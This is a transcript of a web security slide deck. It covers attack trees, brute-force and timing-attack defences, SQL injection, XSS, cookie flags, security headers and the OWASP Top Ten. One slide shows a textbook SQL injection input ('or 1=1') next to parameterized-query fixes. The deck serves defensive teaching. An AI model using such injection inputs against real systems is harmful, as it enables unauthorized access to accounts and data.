Surviving Web Security
-
Upload
gergely-nemeth -
Category
Internet
-
view
211 -
download
1
Transcript of Surviving Web Security
WHAT DO THEY HAVE IN COMMON?
TOGETHER, ALMOST 1 BILLION USER ACCOUNTS COMPROMISED
https://haveibeenpwned.com
ATTACK TREES
“formal, methodical way of describing the security of systems, based on varying attacks”
Bruce Schneier
ATTACK TREESOpen safe
Pick lock Learn combo Cut open Bad setup
Find it written Learn from target
Blackmail Eavesdrop Bribe
Listen to convo Get target to say
ATTACK TREES
to get the most out of attack trees, you have to combine them with knowledge on the attackers
ATTACK TREESOpen safe (P)
Pick lock (I) Learn combo (P) Cut open (P) Bad setup (I)
Find it written (I) Learn from target (P)
Blackmail (I) Eavesdrop (I) Bribe (P)
Listen to convo (P) Get target to say (I)
EXAMPLE ATTACK TREE OF A TRACE ACCOUNTGet access to account
Modify credentials in the database
Learn password
Get access to database
Social engineering
Get access to DMZ
Listen on the transport layer
Brute force
Bypass access control
SQL Injection
Session hijack
Insecure dependency
SECURE TRANSPORT LAYERGet access to account
Modify credentials in the database
Learn password
Get access to database
Social engineering
Get access to DMZ
Listen on the transport layer
Brute force
Bypass access control
SQL Injection
Session hijack
Insecure dependency
BRUTE-FORCE ATTACKSGet access to account
Modify credentials in the database
Learn password
Get access to database
Social engineering
Get access to DMZ
Listen on the transport layer
Brute force
Bypass access control
SQL Injection
Session hijack
Insecure dependency
BRUTE-FORCE PROTECTION
var email = req.body.email var limit = new Limiter({ id: email, db: db })
limit.get(function(err, limit) {
})
BRUTE-FORCE PROTECTION - TIMING ATTACKS
// the bad solution
if (userEnteredPassword === passwordFromDb) { return true}
return false
BRUTE-FORCE PROTECTION - TIMING ATTACKS// the good solutionvar cryptiles = require('cryptiles')
if (cryptiles.fixedTimeComparison( userEnteredPassword, passwordFromDb)) { return true}
return false
SQL INJECTIONGet access to account
Modify credentials in the database
Learn password
Get access to database
Social engineering
Get access to DMZ
Listen on the transport layer
Brute force
Bypass access control
SQL Injection
Session hijack
Insecure dependency
DATA VALIDATION - SQL INJECTION
This attack vector consists of injection of a partial or complete SQL query via user input
DATA VALIDATION - SQL INJECTION
select username, password from users where username=$username
can become:
select username, password from users where username=john or 1=1
DATA VALIDATION - SQL INJECTION
// paramaterized query( "select name from emp where emp_id=$1", [123] ) // prepared query( { name:"emp_name", text:"select name from emp where emp_id=$1", values:[123] })
SESSION HIJACKGet access to account
Modify credentials in the database
Learn password
Get access to database
Social engineering
Get access to DMZ
Listen on the transport layer
Brute force
Bypass access control
SQL Injection
Session hijack
Insecure dependency
COOKIES - COOKIE FLAGS
- secure - this attribute tells the browser to only send the cookie if the
request is being sent over HTTPS.
- HttpOnly - this attribute is used to help prevent attacks such as cross-
site scripting, since it does not allow the cookie to be accessed via
JavaScript.
DATA VALIDATION - XSS
- Reflected Cross Site Scripting occurs when the attacker injects
executable JavaScript code into the HTML response with specially
crafted links
- Stored Cross Site Scripting occurs when the application stores user
input which is not correctly filtered. It runs within the user’s browser
under the privileges of the web application.
SECURITY HEADERS
- Strict-Transport-Security enforces secure (HTTP over SSL/TLS)
connections to the server
- X-Frame-Options provides clickjacking protection
- X-XSS-Protection enables the Cross-site scripting (XSS) filter built into
most recent web browsers
- Content-Security-Policy prevents a wide range of attacks, including
Cross-site scripting and other cross-site injections
HANDLING DEPENDENCIESGet access to account
Modify credentials in the database
Learn password
Get access to database
Social engineering
Get access to DMZ
Listen on the transport layer
Brute force
Bypass access control
SQL Injection
Session hijack
Insecure dependency
HANDLING DEPENDENCIES
Update your dependencies frequently
https://greenkeeper.io
RESTRICT DATABASE ACCESSGet access to account
Modify credentials in the database
Learn password
Get access to database
Social engineering
Get access to DMZ
Listen on the transport layer
Brute force
Bypass access control
SQL Injection
Session hijack
Insecure dependency
Given an unauthenticated userWhen tries to view her profileThen redirected to the login
EXAMPLE STORY
https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet
Injection
Weak authentication and session management
XSSInsecure Direct Object References
Security Misconfiguration
Sensitive Data Exposure
Missing Function Level Access Control
Cross Site Request Forgery
Using Components with Known Vulnerabilities
Unvalidated Redirects and Forwards